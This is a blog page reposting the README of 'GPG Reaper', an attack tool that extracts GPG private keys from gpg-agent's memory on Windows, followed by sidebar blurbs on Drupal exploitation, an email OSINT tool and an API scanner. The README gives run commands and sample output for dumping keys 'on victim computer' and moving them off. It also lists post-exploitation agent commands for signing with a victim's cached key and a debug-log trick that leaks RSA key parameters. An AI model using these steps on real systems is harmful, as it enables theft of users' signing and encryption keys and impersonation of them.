-
GPG Reaper - Obtain/Steal/Restore GPG Private Keys From Gpg-Agent Cache/Memory

 Installation
pip install PGPy
If you got:
TypeError: Error when calling the metaclass bases metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases` when running python script then:
then:
pip install six==1.10.0

Test
1. Install Gpg4Win 3.0.3
2. Open command line and start agent with 2 secondscache time:
cd c:\Program Files (x86)\GnuPG\bin
taskkill /im gpg-agent.exe /F
gpg-agent.exe --daemon --default-cache-ttl 2
3. Run Kleopatra and generate new key pair


4. Sign some example test file


5. Pinetry will popup and ask you for passphrase


6. Repeat step 4-5. Each time pinetry shows up because our 2 seconds cache expired
7. Run GPG reaper
powershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile testme.txt
You will see something like:
[+] Detect GPG version 3.0.3
[*] Readed jmp bytes: F6-05-E0-F9-45-00-04-0F-85
[*] Readed housekeeping bytes: 55
[+] Find sec key
[+] Check key grip:
[*] uid           [ultimate] Adam Nowak 
[+] Found public key
[*] Allocate memory at: 2d00000
[+] Read debug log C:\Users\user\AppData\Local\Temp\gpg_D98F5932C4193BF82B9C773F13899DD586A1DE38_KqALSXPH.txt
[+] Key dumped
[*] Kill background Job
[*] Restore bytes
As you can see we dump key. This is possible because we nopped the housekeeping function.
8. Restore private key:
python gpg_reaper.py .\testme.txt
Private key is dumped to the file:
[+] Dump E057D86EE78A0EED070296C01BC8630ED9C841D0 - Adam Nowak

Introduction
GPG-Agent is a daemon to manage private keys independently from any protocol.
GUI interface communicates with agent using Assuan Protocol.
By default agent caches your credentials.
--default-cache-ttl n option set the time a cache entry is valid to n seconds.
The default is 600 seconds. Each time a cache entry is accessed, its timer is reseted.
Under wnds  sign process looks like this:


Crucial part here is housekeeping() function which is responsible for removing expired credentials from the memory.
But there is one problem here: this function is executed only in two places (inside agent_put_cache and agent_get_cache).
This means that cached credentials are NOT removed from the memory until some gpg-agent commands which uses agent_put_cache or agent_get_cache or agent_flush_cache are executed.

Usage
On victim computer:
powershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile out.txt
Transfer out.txt to your machine and restore private keys:
gpg_reaper.py out.txt
Private keys will be dumped into separate files.
If GPG is installed outside default directories:
Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exe
If you don't want debug messages:
Gpg-Reaper -Verbose $false

Post exploitation on machine with GPG
Let's assume that you are doing penetration testing and you obtain shell on computer with GPG installed.
If you are lucky and user use GPG recently and cache not expire you can:
1. Sign some file:
Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exe
  • Get list of keys available on specific machine
KEYINFO --list
S KEYINFO 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2 D - - - P - - -
  • Set keygrip and message hash
SIGKEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2
# SHA512 of the message
SETHASH 10 7bfa95a688924c47c7d22381f20cc926f524beacb13f84e203d4bd8cb6ba2fce81c57a5f059bf3d509926487bde925b3bcee0635e4f7baeba054e5dba696b2bf
PKSIGN
2. Export private key:
Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exe
  • Get wrapping key
KEYWRAP_KEY --export
  • Export a secret key from the key store. The key will be encrypted using the current session's key wrapping key using the AESWRAP-128 algorithm
EXPORT_KEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2
Unfortunately this is not working as expected and ask for password.
Why? Because cmd_export_key() function is executing agent_key_from_file() with CACHE_MODE_IGNORE flag which means that cache won't be used and user is asked for passphrase each time.

Bypass private key export restriction
We know that it's not possible to export GPG key through gpg-agent without knowing password.
But there is little quirk here. Agent has few optionsavailable:
1. --debug-level
Select the debug level for investigating problems. level may be a numeric value or a keyword:
 guru - All of the debug messages you can get.
2. --log-file file
Append all logging output to file. This is very helpful in seeing what the agent actually does.
Let's run agent using gpg-agent.exe --daemon --debug-level guru --log-file out.txt and sign some file.
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- -="" 18:21:15="" 2018-03-04="" 590a068768b6a5cb4dd81cd4828c72ad8427dfe4="" chan_0x0000008c="" dbg:="" gpg-agent="" sigkey=""> OK
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- adam.xxx="" adam="" enter="" key:="" nowak="" passphrase="" penpgp="" please="" secret="" setkeydesc="" the="" to="" unlock="">%22%0A2048-bit+RSA+key,+ID+1308197BFDF95EAA,%0Acreated+2018-02-28.%0A
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- -="" 18:21:15="" 2018-03-04="" 8="" b00357d0b85243bb34049e13fd5c328228bc53b317df970594a1ced6cb89f4ea="" chan_0x0000008c="" dbg:="" gpg-agent="" sethash=""> OK
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- -="" ...="" 18:21:15="" 2018-03-04="" 2="" a="" agent_get_cache="" chan_0x0000008c="" connection="" dbg:="" entry="" established="" gpg-agent="" miss="" mode="" new="" pin="" pksign="" starting="" to=""> INQUIRE PINENTRY_LAUNCHED 3736 qt 1.1.0 /dev/tty - -
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- 18:21:18="" 2018-03-04="" 2="" agent_put_cache="" code="" d="" data="" dbg:="" e="" end="" flags="" gpg-agent="" hash:="" hash="" mode="" n="" p="" pkcs1="" private-key="" q="" requested="" rsa="" sha256="" skey:="" ttl="0" u="">
It looks like guru mode prints nedpq and u numbers to log file. Knowing this we can calculate public and private key.
Internally skey value is print by gcry_log_debugsxp()when DBG_CRYPTO is set:
if (DBG_CRYPTO)
{
  gcry_log_debugsxp ("skey", s_skey);
  gcry_log_debugsxp ("hash", s_hash);
}

FAQ
  1. Why PowerShell?
Because this file can be run without any external dependencies on most modern Windows systems.
  1. GPG %file% not exist
gpg-connect-agent.exegpg-agent.exe or gpg.exe does not exist in default location.
You can try to specify custom location using:
Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exe
  1. No gpg-agent running
gpg-agent.exe is not running on this system so we cannot restore private key.
  1. Unknown gpg-agent version, sha256:
Currently this script support only specific versions
  1. No cached key
There is no cached key in memory so we cannot 
restore 
https://github.com/kacperszurek/gpg_reaper

تعليقات

إرسال تعليق

المشاركات الشائعة من هذه المدونة

-
صورة
Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners The Drupal vulnerability (CVE-2018-7600), dubbed  Drupalgeddon2  that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. Drupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. However, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC)  exploit code  was made widely available, and large-scale Internet scanning and exploitation attempts followed. At the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency m...
Plus d'infos »chaker hacker
-
صورة
Infoga - البريد الإلكتروني OSINT Infoga هي أداة لجمع معلومات حسابات البريد الإلكتروني (ip ، hostname ، country ، ...) من مصادر عامة مختلفة (محركات البحث ، خوادم key pg و shodan) وتحقق مما إذا كانت رسائل البريد الإلكتروني قد تسربت باستخدام واجهة برمجة التطبيقات hasibeenpwned.com. هي أداة بسيطة حقًا ، ولكنها فعالة جدًا في المراحل الأولى من اختبار الاختراق أو لمجرد معرفة مستوى شركتك في الإنترنت. التركيب $ git clone https://github.com/m4ll0k/Infoga.git infoga $ cd infoga $ python setup.py install $ python infoga.py استعمال     $ python infoga.py --domain nsa.gov --source all --breach -v 2 --report ../nsa_gov.txt $ python infoga.py --info [email protected] --breach -v 3 --report ../m4ll0k.txt تحميل Infoga
Plus d'infos »chaker hacker
-
صورة
Astra - Automated Security Testing For REST API's  is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early during development cycle. Astra can automatically detect and test login & logout (Authentication API), so it's easy for anyone to integrate this into CICD pipeline. Astra can take API collection as an input so this can also be used for testing apis in standalone mode. SQL injection Cross site scripting Information Leakage Broken Authentication and session management CSRF (including Blind CSRF) Rate limit CORS misonfiguration (including CORS bypass techniques) JWT attack Coming soon XXE CSP misconfiguration Requirement Linux or MacOS Python 2.7 mongoDB Installation $ git clone https://github.com/flipkart-incubator/Astra $ cd Astra $ sudo pip install -r require...
Plus d'infos »chaker hacker